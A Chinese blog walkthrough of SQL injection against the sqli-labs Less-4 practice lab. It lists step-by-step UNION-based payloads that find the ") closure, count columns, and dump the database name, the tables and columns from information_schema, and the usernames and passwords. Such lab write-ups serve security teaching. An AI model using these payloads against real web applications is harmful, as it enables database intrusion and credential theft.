SQL注入实例(sqli-labs/less-4)

avatar
作者
猴君
阅读量:0

0、初始页面

1、确定闭合符号

前两条判断是否为数值型注入,后两条判断字符型注入的闭合符号

?id=1 and 1=1  ?id=1 and 1=2 ?id=1" ?id=1")

2、确定表的列数

?id=1") order by 3 --+

3、确定回显位置 

?id=-1") union select 1,2,3 --+

4、爆库名

?id=-1") union select 1,user(),database() --+

5、爆表名

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

6、爆列名

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema='security' --+

7、显示最终目标

?id=-1") union select 1,2,group_concat(username,0x3a,password) from security.users --+

相关阅读
  1. 如何查看和设置我的Android N设备的权限?
  2. 如何在安卓手机上自定义应用图标?
  3. 如何在安卓微信中同时听语音和查看图片?
  4. 华为哪些设备将支持升级至安卓7.0?
  5. 微信安卓软件中Q10功能有哪些独特之处?
  6. 安卓用户如何挑选最佳视频播放器应用?
  7. 安卓系统中用户文件目录的确切位置是什么?
  8. 小米4用户如何安全升级到安卓8.0系统?
  9. 如何成功将魅蓝5升级至安卓原生7.0版本?
  10. 16GB存储的安卓手机是否能满足日常需求?